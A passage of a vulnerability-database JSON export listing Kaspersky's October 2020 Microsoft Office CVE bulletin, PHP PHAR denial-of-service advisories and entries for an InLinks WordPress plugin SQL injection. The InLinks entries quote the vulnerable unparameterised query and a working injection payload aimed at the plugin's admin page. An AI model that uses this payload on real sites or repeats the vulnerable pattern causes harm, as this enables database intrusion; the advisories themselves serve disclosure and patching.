\n[CVE-2020-16947](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16947>) \n[CVE-2020-16944](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16944>) \n[CVE-2020-16945](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16945>) \n[CVE-2020-16948](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16948>) \n[CVE-2020-16949](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16949>) \n[CVE-2020-16942](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16942>) \n[CVE-2020-16932](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16932>) \n[CVE-2020-16952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16952>) \n[CVE-2020-16955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16955>) \n[CVE-2020-16954](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16954>) \n[CVE-2020-16951](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16951>) \n[CVE-2020-16950](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16950>) \n[CVE-2020-16953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16953>) \n[CVE-2020-16934](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16934>) \n[CVE-2020-16933](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16933>) \n[CVE-2020-16918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16918>) \n[CVE-2020-16957](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16957>) \n[CVE-2020-16930](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16930>) \n[CVE-2020-16931](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16931>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2020-16918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16918>)0.0Unknown \n[CVE-2020-16928](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16928>)0.0Unknown \n[CVE-2020-16929](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16929>)0.0Unknown \n[CVE-2020-16941](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16941>)0.0Unknown \n[CVE-2020-16946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16946>)0.0Unknown \n[CVE-2020-16947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16947>)0.0Unknown \n[CVE-2020-16944](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16944>)0.0Unknown \n[CVE-2020-16945](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16945>)0.0Unknown \n[CVE-2020-16948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16948>)0.0Unknown \n[CVE-2020-16949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16949>)0.0Unknown \n[CVE-2020-16942](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16942>)0.0Unknown \n[CVE-2020-16932](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16932>)0.0Unknown \n[CVE-2020-16952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16952>)0.0Unknown \n[CVE-2020-16955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16955>)0.0Unknown \n[CVE-2020-16954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16954>)0.0Unknown \n[CVE-2020-16951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16951>)0.0Unknown \n[CVE-2020-16950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16950>)0.0Unknown \n[CVE-2020-16953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16953>)0.0Unknown \n[CVE-2020-16934](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16934>)0.0Unknown \n[CVE-2020-16933](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16933>)0.0Unknown \n[CVE-2020-16957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16957>)0.0Unknown \n[CVE-2020-16930](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16930>)0.0Unknown \n[CVE-2020-16931](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16931>)0.0Unknown\n\n### *KB list*:\n[4486682](<http://support.microsoft.com/kb/4486682>) \n[4486678](<http://support.microsoft.com/kb/4486678>) \n[4484417](<http://support.microsoft.com/kb/4484417>) \n[4486676](<http://support.microsoft.com/kb/4486676>) \n[4486694](<http://support.microsoft.com/kb/4486694>) \n[4486707](<http://support.microsoft.com/kb/4486707>) \n[4486701](<http://support.microsoft.com/kb/4486701>) \n[4486687](<http://support.microsoft.com/kb/4486687>) \n[4486708](<http://support.microsoft.com/kb/4486708>) \n[4486677](<http://support.microsoft.com/kb/4486677>) \n[4486674](<http://support.microsoft.com/kb/4486674>) \n[4486688](<http://support.microsoft.com/kb/4486688>) \n[4484524](<http://support.microsoft.com/kb/4484524>) \n[4486663](<http://support.microsoft.com/kb/4486663>) \n[4486689](<http://support.microsoft.com/kb/4486689>) \n[4484531](<http://support.microsoft.com/kb/4484531>) \n[4486700](<http://support.microsoft.com/kb/4486700>) \n[4486679](<http://support.microsoft.com/kb/4486679>) \n[4486695](<http://support.microsoft.com/kb/4486695>) \n[4486703](<http://support.microsoft.com/kb/4486703>) \n[4484435](<http://support.microsoft.com/kb/4484435>) \n[4486692](<http://support.microsoft.com/kb/4486692>) \n[4462175](<http://support.microsoft.com/kb/4462175>) \n[4486671](<http://support.microsoft.com/kb/4486671>)", "published": "2020-10-13T00:00:00", "modified": "2020-10-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA11976", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2020-16932", "CVE-2020-16928", "CVE-2020-16957", "CVE-2020-16941", "CVE-2020-16947", "CVE-2020-16934", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16950", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16955", "CVE-2020-16929", "CVE-2020-16930", "CVE-2020-16933", "CVE-2020-16918", "CVE-2020-16931", "CVE-2020-16954", "CVE-2020-16952", "CVE-2020-16949"], "immutableFields": [], "lastseen": "2020-11-03T05:37:58", "history": [], "viewCount": 33, "enchantments": {"dependencies": {"modified": "2020-11-03T05:37:58", "references": [{"idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/", "MSF:ILITIES/MSFT-CVE-2020-16951/"], "type": "metasploit"}, {"idList": ["KLA11974"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3"], "type": "qualysblog"}, {"idList": ["THREATPOST:779B904F971138531725D1E57FDFF9DD"], "type": "threatpost"}, {"idList": ["MS:CVE-2020-16930", "MS:CVE-2020-16954", "MS:CVE-2020-16934", "MS:CVE-2020-16918", "MS:CVE-2020-16933", "MS:CVE-2020-16950", "MS:CVE-2020-16941", "MS:CVE-2020-16945", "MS:CVE-2020-16957", "MS:CVE-2020-16955"], "type": "mscve"}, {"idList": ["RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"], "type": "rapid7blog"}, {"idList": ["AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"], "type": "attackerkb"}, {"idList": ["SMB_NT_MS20_OCT_OFFICE.NASL", "SMB_NT_MS20_OCT_OFFICE_WEB.NASL", "SMB_NT_MS20_OCT_WORD.NASL", "SMB_NT_MS20_OCT_EXCEL.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2010.NASL", "MACOS_MS20_OCT_OFFICE.NASL", "SMB_NT_MS20_OCT_OUTLOOK.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:159612"], "type": "packetstorm"}, {"idList": ["CVE-2020-16957", "CVE-2020-16934", "CVE-2020-16945", "CVE-2020-16950", "CVE-2020-16953", "CVE-2020-16946", "CVE-2020-16930", "CVE-2020-16933", "CVE-2020-16918", "CVE-2020-16954"], "type": "cve"}, {"idList": ["ZDI-20-1250", "ZDI-20-1252", "ZDI-20-1253", "ZDI-20-1255", "ZDI-20-1249", "ZDI-20-1251", "ZDI-20-1256"], "type": "zdi"}, {"idList": ["KB4486700", "KB4486688", "KB4486677", "KB4486674", "KB4486694", "KB4486676", "KB4486707", "KB4486689", "KB4486678", "KB4486708"], "type": "mskb"}, {"idList": ["CISA:48962A3B37B032DCF622B3E3135B8A1A"], "type": "cisa"}, {"idList": ["KREBS:7252221B56E65C46DEF83A6DDC0B70FB"], "type": "krebs"}], "rev": 2}, "score": {"modified": "2020-11-03T05:37:58", "rev": 2, "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2020-11-03T05:37:58", "differentElements": ["cvss2", "cvss3", "description", "href", "references", "title"], "edition": 3}], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "WEB_APPLICATION_SCANNING_112737", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2010.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "WEB_APPLICATION_SCANNING_112739", "SMB_NT_MS20_OCT_OFFICE.NASL", "WEB_APPLICATION_SCANNING_112740", "WEB_APPLICATION_SCANNING_112738", "MACOS_MS20_OCT_OFFICE.NASL"]}, {"type": "mskb", "idList": ["KB4486703", "KB4486694", "KB4486692", "KB4486682", "KB4486677", "KB4486708", "KB4484417", "KB4486701", "KB4484435", "KB4486679"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2020-16951/", "MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "cve", "idList": ["CVE-2020-16945", "CVE-2020-16954", "CVE-2020-16957", "CVE-2020-16934", "CVE-2020-16933", "CVE-2020-16946", "CVE-2020-16930", "CVE-2020-16953", "CVE-2020-16918", "CVE-2020-16950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB"]}, {"type": "attackerkb", "idList": ["AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3"]}, {"type": "mscve", "idList": ["MS:CVE-2020-16933", "MS:CVE-2020-16934", "MS:CVE-2020-16950", "MS:CVE-2020-16955", "MS:CVE-2020-16941", "MS:CVE-2020-16930", "MS:CVE-2020-16954", "MS:CVE-2020-16957", "MS:CVE-2020-16945", "MS:CVE-2020-16918"]}, {"type": "zdi", "idList": ["ZDI-20-1256", "ZDI-20-1251", "ZDI-20-1255", "ZDI-20-1252", "ZDI-20-1253", "ZDI-20-1250", "ZDI-20-1249"]}, {"type": "cisa", "idList": ["CISA:48962A3B37B032DCF622B3E3135B8A1A"]}, {"type": "zdt", "idList": ["1337DAY-ID-35071"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612"]}, {"type": "kaspersky", "idList": ["KLA11974"]}], "modified": "2021-08-18T11:00:15", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-18T11:00:15", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.kaspersky.KasperskyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.kaspersky.KasperskyBulletin"]}], "wpexploit": [{"id": "WPEX-ID:D3DC270D-8623-43B0-B760-06CA9DD13170", "hash": "dfb618c9db1a1a98e88efa7c78176a1e", "type": "wpexploit", "bulletinFamily": "exploit", "title": "InLinks 1.0 - Authenticated SQL Injection", "description": "SQL injection is POST parameter \"keyword\" Affected file inlinks/inlinks.php Affected lines: 58 $Keyword = trim($_POST['keyword']); 59 $URL = trim($_POST['url']); 60 $Rel = trim($_POST['rel']); 61 $Target = trim($_POST['target']); 62 $table_name = $wpdb->prefix .\"URLKeywordsMapping\"; 63 $SelectKeywordURLMappingDetails = \"select * from $table_name where FldKeyword LIKE '\".$Keyword.\"'\" ; 64 65 $KeywordURLMappingDetails = $wpdb->get_results($SelectKeywordURLMappingDetails); 66 67 if(count($KeywordURLMappingDetails)) 68 { 69 $Message = \"\n\nThe keyword _\".$Keyword.\"_ already exists in the table.\n\n\"; 70 } More issues seems to exist in the plugin, because of lack of input validation and the lack of use of prepared statements. Affected URL: /wp-admin/options-general.php?page=inlinks%2Finlinks.php POST Parameters (with payload): keyword=gweeperx'or+2=2--+-&amp;url;=http%3A%2F%2F127.0.0.4&amp;rel;=nofollow&amp;target;=_blank&amp;ActionType;=AddKeywordURL&amp;Add;=Add\n", "published": "2017-11-22T00:00:00", "modified": "2020-09-22T07:21:42", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "", "reporter": "Dimopoulos Elias", "references": ["https://packetstormsecurity.com/files/145059/"], "cvelist": ["CVE-2017-16955"], "lastseen": "2021-02-15T22:18:40", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-16955"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:D3DC270D-8623-43B0-B760-06CA9DD13170"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145059"]}], "modified": "2021-02-15T22:18:40", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2021-02-15T22:18:40", "rev": 2}}, "objectVersion": "1.4", "sourceData": "/wp-admin/options-general.php?page=inlinks%2Finlinks.php\r\n\r\nPOST Parameters (with payload):\r\nkeyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add", "generation": 1, "_object_type": "robots.models.wpvulndb.WPExploitBulletin", "_object_types": ["robots.models.wpvulndb.WPExploitBulletin", "robots.models.base.Bulletin"]}], "wpvulndb": [{"id": "WPVDB-ID:D3DC270D-8623-43B0-B760-06CA9DD13170", "hash": "5126fb2eee5b88a6d3c32138b4b4d50a", "type": "wpvulndb", "bulletinFamily": "software", "title": "InLinks 1.0 - Authenticated SQL Injection", "description": "SQL injection is POST parameter \"keyword\" Affected file inlinks/inlinks.php Affected lines: 58 $Keyword = trim($_POST['keyword']); 59 $URL = trim($_POST['url']); 60 $Rel = trim($_POST['rel']); 61 $Target = trim($_POST['target']); 62 $table_name = $wpdb->prefix .\"URLKeywordsMapping\"; 63 $SelectKeywordURLMappingDetails = \"select * from $table_name where FldKeyword LIKE '\".$Keyword.\"'\" ; 64 65 $KeywordURLMappingDetails = $wpdb->get_results($SelectKeywordURLMappingDetails); 66 67 if(count($KeywordURLMappingDetails)) 68 { 69 $Message = \"\n\nThe keyword _\".$Keyword.\"_ already exists in the table.\n\n\"; 70 } More issues seems to exist in the plugin, because of lack of input validation and the lack of use of prepared statements. Affected URL: /wp-admin/options-general.php?page=inlinks%2Finlinks.php POST Parameters (with payload): keyword=gweeperx'or+2=2--+-&amp;url;=http%3A%2F%2F127.0.0.4&amp;rel;=nofollow&amp;target;=_blank&amp;ActionType;=AddKeywordURL&amp;Add;=Add\n\n### PoC\n\n/wp-admin/options-general.php?page=inlinks%2Finlinks.php POST Parameters (with payload): keyword=gweeperx'or+2=2--+-&amp;url;=http%3A%2F%2F127.0.0.4&amp;rel;=nofollow&amp;target;=_blank&amp;ActionType;=AddKeywordURL&amp;Add;=Add\n", "published": "2017-11-22T00:00:00", "modified": "2020-09-22T07:21:42", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://wpscan.com/vulnerability/d3dc270d-8623-43b0-b760-06ca9dd13170", "reporter": "Dimopoulos Elias", "references": ["https://packetstormsecurity.com/files/145059/"], "cvelist": ["CVE-2017-16955"], "lastseen": "2021-02-15T22:18:40", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-16955"]}, {"type": "wpexploit", "idList": ["WPEX-ID:D3DC270D-8623-43B0-B760-06CA9DD13170"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145059"]}], "modified": "2021-02-15T22:18:40", "rev": 2}, "score": {"value": 4.7, "vector": "NONE", "modified": "2021-02-15T22:18:40", "rev": 2}}, "objectVersion": "1.4", "affectedSoftware": [{"version": "*", "operator": "eq", "name": "nlinks"}], "exploit": "/wp-admin/options-general.php?page=inlinks%2Finlinks.php\r\n\r\nPOST Parameters (with payload):\r\nkeyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add", "sourceData": "", "generation": 1, "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.wpvulndb.WPVulnDBBulletin"]}], "securityvulns": [{"id": "SECURITYVULNS:VULN:14753", "bulletinFamily": "software", "title": "PHP security vulnerabilities", "description": "PHAR extension DoS.", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2021-06-08T19:08:49", "history": [{"bulletin": {"affectedSoftware": [{"name": "PHP", "operator": "eq", "version": "5.6"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHAR extension DoS.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:10:03", "references": [{"idList": ["ALAS-2015-602", "ALAS-2015-601"], "type": "amazon"}, {"idList": ["CVE-2015-7803", "CVE-2015-7804"], "type": "cve"}, {"idList": ["H1:103990", "H1:104008"], "type": "hackerone"}, {"idList": ["SECURITYVULNS:DOC:32651"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310806649", "OPENVAS:1361412562310806648", "OPENVAS:703380", "OPENVAS:1361412562310120520", "OPENVAS:1361412562310842508", "OPENVAS:1361412562310807000", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310703380", "OPENVAS:1361412562310120396", "OPENVAS:1361412562311220191984"], "type": "openvas"}, {"idList": ["RHSA-2016:0457"], "type": "redhat"}, {"idList": ["SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1", "SUSE-SU-2016:1581-1"], "type": "suse"}, {"idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"], "type": "debian"}, {"idList": ["USN-2786-1"], "type": "ubuntu"}, {"idList": ["SSA-2016-034-04"], "type": "slackware"}, {"idList": ["GLSA-201606-10"], "type": "gentoo"}, {"idList": ["ALA_ALAS-2015-602.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "UBUNTU_USN-2786-1.NASL", "PHP_5_6_14.NASL", "SUSE_SU-2016-0284-1.NASL", "PHP_5_5_30.NASL", "SLACKWARE_SSA_2016-034-04.NASL", "OPENSUSE-2016-100.NASL", "ALA_ALAS-2015-601.NASL", "DEBIAN_DSA-3380.NASL"], "type": "nessus"}, {"idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"], "type": "freebsd"}, {"idList": ["F5:K17503", "SOL17503"], "type": "f5"}, {"idList": ["CLSA-2020:1605798462"], "type": "cloudlinux"}], "rev": 2}, "score": {"modified": "2018-08-31T11:10:03", "rev": 2, "value": 7.4, "vector": "NONE"}}, "hash": "5bebcb6b83df2b42d069178c1e9ea73c038f8703bc95cf2b81c683a8d0d17ff6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "94aee96d0a33ff770af1ab8e308073f0", "key": "cvelist"}, {"hash": "c514412540c1e967450f03283e4ed180", "key": "references"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "5c799165d68e636bd0726587ae899c0d", "key": "description"}, {"hash": "6d2dcaed858380d54d5782ad38c55586", "key": "affectedSoftware"}, {"hash": "2c5cca82a8670da097919f6160833daf", "key": "reporter"}, {"hash": "b3b8db0e3c7acd6c3190db6f8e88e96b", "key": "href"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "modified"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "3a18a828bc11b79a70839be146b3b5a3", "key": "title"}, {"hash": "d54751dd75af2ea0147b462b3e001cd0", "key": "type"}, {"hash": "d8f38bedae5c73d95ff296ba2bd86a44", "key": "published"}], "history": [], "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "id": "SECURITYVULNS:VULN:14753", "immutableFields": [], "lastseen": "2018-08-31T11:10:03", "modified": "2015-11-02T00:00:00", "objectVersion": "1.5", "published": "2015-11-02T00:00:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32651"], "reporter": "BUGTRAQ", "title": "PHP security vulnerabilities", "type": "securityvulns", "viewCount": 212}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-08-31T11:10:03"}], "edition": 2, "hashmap": [{"key": "affectedSoftware", "hash": "1858c8bfb7eb8aace48fa57059397c29"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "5c799165d68e636bd0726587ae899c0d"}, {"key": "href", "hash": "b3b8db0e3c7acd6c3190db6f8e88e96b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "c514412540c1e967450f03283e4ed180"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "3a18a828bc11b79a70839be146b3b5a3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "8859a40c26baff900b73dab92cbb6fd72e9b8dcbbd9acc6d613b18d55563796e", "viewCount": 222, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32651"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2021-06-08T19:08:49", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-06-08T19:08:49", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "php", "operator": "eq", "version": "5.6"}], "immutableFields": [], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32651", "bulletinFamily": "software", "title": "[USN-2786-1] PHP vulnerabilities", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. &#40;CVE-2015-7803, CVE-2015-7804&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": 